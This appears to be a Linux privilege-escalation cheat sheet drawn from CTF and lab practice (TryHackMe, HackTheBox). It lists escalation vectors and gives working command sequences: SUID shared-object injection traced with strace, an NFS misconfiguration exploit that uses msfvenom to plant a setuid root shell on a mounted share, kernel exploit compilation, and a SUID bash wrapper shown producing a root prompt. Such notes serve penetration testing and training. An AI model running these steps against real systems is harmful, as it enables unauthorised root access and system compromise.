Linux Privilege Escalation
OS & User Enumeration :
PrivEsc Checklist :
sensitive files & permission misconfiguration (SSH keys, shadow files)
SUID Binaries
Internal Ports
Processes running with root privilege
Cron tabs
Hidden cron process with pspy
Mounted filesystems
TMUX session hijacking
Path Hijacking
Process Injection (https://github.com/nongiach/sudo_inject)
Docker PS
Interesting groups (https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe)
Wheel
Shadow
Disk
Video
Root
Docker
Environment variables
bash version < 4.2-048 | 4.4 (https://tryhackme.com/room/linuxprivesc Task 14, 15)
NFS Misconfiguration
linpeas.sh -a //all checks
SUID Shared Object Injection :
Find a SUID binary that looks fishy
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
Match the shared object that sits in a path where you have write access
create a shared object in the missing SO file name
run the SUID binary
NFS Misconfiguration :
https://tryhackme.com/room/linuxprivesc (Task 19)
cat /etc/exports
On Kali
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
On Target
/tmp/shell.elf
Kernel Exploits
cat /proc/version
uname -r
uname -mrs
cat /etc/lsb-release
cat /etc/os-release
gcc exploit.c -o exp
Compile exploit in local machine and upload to remote machine
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
apt-get install gcc-multilib
Recover Deleted Files :
extundelete (HTB mirai - https://tiagotavares.io/2017/11/mirai-hack-the-box-retired/)
strings
C Program to SetUID /bin/bash :
gcc -Wall suid.c -o exploit
sudo chown root exploit
sudo chmod u+s exploit
$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit
./exploit
# whoami
root
Tools :
Resources :
Last updated